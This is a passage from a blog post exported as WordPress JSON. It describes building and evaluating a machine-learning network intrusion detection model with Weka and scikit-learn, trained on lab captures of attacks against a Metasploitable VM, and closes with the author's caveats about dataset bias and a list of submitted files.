aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?resize=1243%2C812&#038;ssl=1\" alt=\"Graphical user interface, application Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?w=1243&amp;ssl=1 1243w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?resize=1024%2C669&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/graphical-user-interface-application-description-2.png?resize=768%2C502&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/strong><\/p>\n<p>Correctly Classified Instances 15815 96.0464 
%<\/p>\n<p>Incorrectly Classified Instances 651 3.9536 %<\/p>\n<h4><a id=\"post-4392-_Toc80553239\"><\/a>Na\u00efve Bayes<\/h4>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1241\" height=\"811\" class=\"wp-image-4405 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?resize=1241%2C811&#038;ssl=1\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?w=1241&amp;ssl=1 1241w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?resize=300%2C196&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?resize=1024%2C669&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image.png?resize=768%2C502&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<p>Correctly Classified Instances 15216 92.4086 %<\/p>\n<p>Incorrectly Classified Instances 1250 7.5914 %<\/p>\n<h2><a id=\"post-4392-_Toc80553240\"><\/a>Summary of Weka Models<\/h2>\n<p>Based on the outputs above, J48 decision tree model gave us best accuracy so we will proceed to build a detection tool around the same.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Model<\/strong><\/td>\n<td><strong>Accuracy<\/strong><\/td>\n<\/tr>\n<tr>\n<td>J48<\/td>\n<td>98.41%<\/td>\n<\/tr>\n<tr>\n<td>MLP<\/td>\n<td>98.07%<\/td>\n<\/tr>\n<tr>\n<td>SMO<\/td>\n<td>96.05%<\/td>\n<\/tr>\n<tr>\n<td>Na\u00efve Bayes<\/td>\n<td>92.41%<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a id=\"post-4392-_Toc80553241\"><\/a>Building Offline Detection Tool<\/h2>\n<p>We used the below for building our offline detection tool: &#8211;<\/p>\n<ul>\n<li>Python: 3.8.5 (default, Jan 27 2021, 15:41:15)<\/li>\n<li>[GCC 9.3.0]<\/li>\n<li>scipy: 1.6.0<\/li>\n<li>numpy: 1.19.5<\/li>\n<li>matplotlib: 3.4.3<\/li>\n<li>pandas: 1.3.1<\/li>\n<li>sklearn: 0.24.2<\/li>\n<\/ul>\n<p>We\u2019ve split our data into 3 datasets, 
one for training, another for validation, and the last one for testing. After running this program for the default dataset \u201cmaster_dataset.csv\u201d, we get the output below: &#8211;<\/p>\n<p>We used the models below for comparison on accuracy: &#8211;<\/p>\n<ul>\n<li>&#8216;LR&#8217; : Logistic Regression<\/li>\n<li>&#8216;LDA&#8217;: Linear Discriminant Analysis<\/li>\n<li>&#8216;KNN&#8217;: KNeighbors Classifier<\/li>\n<li>&#8216;CART&#8217;: Decision Tree Classifier<\/li>\n<\/ul>\n<p>Command: <em>python3 step3_train.py<\/em><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"541\" height=\"301\" class=\"wp-image-4406 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.jpeg?resize=541%2C301&#038;ssl=1\" alt=\"Diagram Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.jpeg?w=541&amp;ssl=1 541w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/diagram-description-automatically-generated.jpeg?resize=300%2C167&amp;ssl=1 300w\" sizes=\"auto, (max-width: 541px) 100vw, 541px\" \/><\/p>\n<p>We are using CART or Decision Tree, which is a white box type of ML algorithm. The time complexity of decision trees is a function of the number of records and number of attributes in the given data. Decision trees can handle high-dimensional data with good accuracy.<\/p>\n<p>As seen from the output below CART was reported to have maximum accuracy for the first comparison i.e. 98.21% which is very close to what we observed in Weka i.e. 
98.40% accuracy.<\/p>\n<p>The accuracy on the final testing dataset was 98.31%.<\/p>\n<p>We saved our model using the joblib library as \u201cfinalized_DT_model.sav\u201d.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1390\" height=\"876\" class=\"wp-image-4407 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?resize=1390%2C876&#038;ssl=1\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?w=1390&amp;ssl=1 1390w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?resize=300%2C189&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?resize=1024%2C645&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-1.png?resize=768%2C484&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h3><a id=\"post-4392-_Toc80553242\"><\/a>Executing this model on a new dataset<\/h3>\n<p>We initiated a fresh probe, captured the traffic, converted it to CSV, labelled it as \u201cunknown\u201d and appended it to master-dataset.csv. We then ran the same model again and checked the confusion matrix. As seen below, the confusion matrix places all counts of the new probe in the fourth column, which is the probe class itself.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"527\" height=\"666\" class=\"wp-image-4408 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-table-description-automatica.png?resize=527%2C666&#038;ssl=1\" alt=\"A picture containing table Description automatically generated\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-table-description-automatica.png?w=527&amp;ssl=1 527w, 
https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/a-picture-containing-table-description-automatica.png?resize=237%2C300&amp;ssl=1 237w\" sizes=\"auto, (max-width: 527px) 100vw, 527px\" \/><\/p>\n<p>We also ran the amended master-dataset.csv through the Weka J48 model to confirm our results. As expected, it gave us a similar confusion matrix, which confirms that the prediction works as expected:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1240\" height=\"807\" class=\"wp-image-4409 aligncenter\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?resize=1240%2C807&#038;ssl=1\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?w=1240&amp;ssl=1 1240w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?resize=300%2C195&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?resize=1024%2C666&amp;ssl=1 1024w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/word-image-2.png?resize=768%2C500&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/p>\n<h1><a id=\"post-4392-_Toc80553243\"><\/a>Results<\/h1>\n<p>We were able to successfully produce a working detection model using a decision tree algorithm with an accuracy of 98.4%. 
The results of the tool coincided with those produced by Weka, showing that the tool we\u2019ve created and the model we\u2019ve deployed produce legitimate results.<\/p>\n<h1><a id=\"post-4392-_Toc80553244\"><\/a>Discussion<\/h1>\n<p>We first tried \u201cCICFlowMeter\u201d for feature extraction. It took us days just to get it running, as most of its dependencies are very old, and even once it was up and running it gave inconsistent outputs for the same data across multiple iterations: for example, for a flow of 2200 packets it produced output for only 101 packets. This made us switch to tshark instead.<\/p>\n<p>We tried different ways of attacking the Metasploitable VM, but given the limited resources of our laptop the VMs would crash frequently, so we had to select less resource-intensive attack methodologies.<\/p>\n<p>We have concluded that while our model\u2019s accuracy is very high, i.e. 98.4%, this is because the dataset we used is small and hence introduced some bias. If we were doing this for a production environment with more infrastructure resources available, we would run the captures for days.<\/p>\n<p>We have provided the files below as part of the submission.<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>Serial<\/strong><\/td>\n<td><strong>File<\/strong><\/td>\n<td><strong>Remark<\/strong><\/td>\n<\/tr>\n<tr>\n<td>1<\/td>\n<td>step1_cleanup.py<\/td>\n<td>For CSV cleanup<br \/>\npython3 step1_cleanup.py filename.csv<\/td>\n<\/tr>\n<tr>\n<td>2<\/td>\n<td>step2_labelling.py<\/td>\n<td>For labelling the CSV<br \/>\npython2 step2_labelling.py benign updated_benign.csv<\/td>\n<\/tr>\n<tr>\n<td>3<\/td>\n<td>step3_train.py<\/td>\n<td>For training and prediction (refers to the static file master_dataset.csv)<br \/>\npython3 step3_train.py<\/td>\n<\/tr>\n<tr>\n<td>4<\/td>\n<td>master_dataset.csv<\/td>\n<td>Consolidated dataset<\/td>\n<\/tr>\n<tr>\n<td>5<\/td>\n<td>Folder<br \/>\nWireshark 
Captures<\/td>\n<td>Raw Attack Wireshark Captures<\/td>\n<\/tr>\n<tr>\n<td>6<\/td>\n<td>Folder<br \/>\nLabelled Data<\/td>\n<td>Individual attack CSV files<\/td>\n<\/tr>\n<tr>\n<td>7<\/td>\n<td>finalized_DT_model.sav<\/td>\n<td>Saved ML Model<\/td>\n<\/tr>\n<tr>\n<td>8<\/td>\n<td>ddos.py<\/td>\n<td>For DDoS simulation<br \/>\npython2 ddos.py<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>Disclaimer:- This note was written by me ( Mayank Nauni)\u00a0in my personal capacity. The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the 
OEMs.&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[53],"tags":[62,66,61,68,60,63,67],"class_list":["post-4392","post","type-post","status-publish","format-standard","hentry","category-cyber-security","tag-attack","tag-dataset","tag-intrusion-detection","tag-machine-learning","tag-network-anomaly-detection","tag-nids","tag-tools"],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4392","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4392"}],"version-history":[{"count":13,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4392\/revisions"}],"predecessor-version":[{"id":4422,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4392\/revisions\/4422"}],"wp:attachment":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4392"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4392"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4392"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}
","templated":true}]}}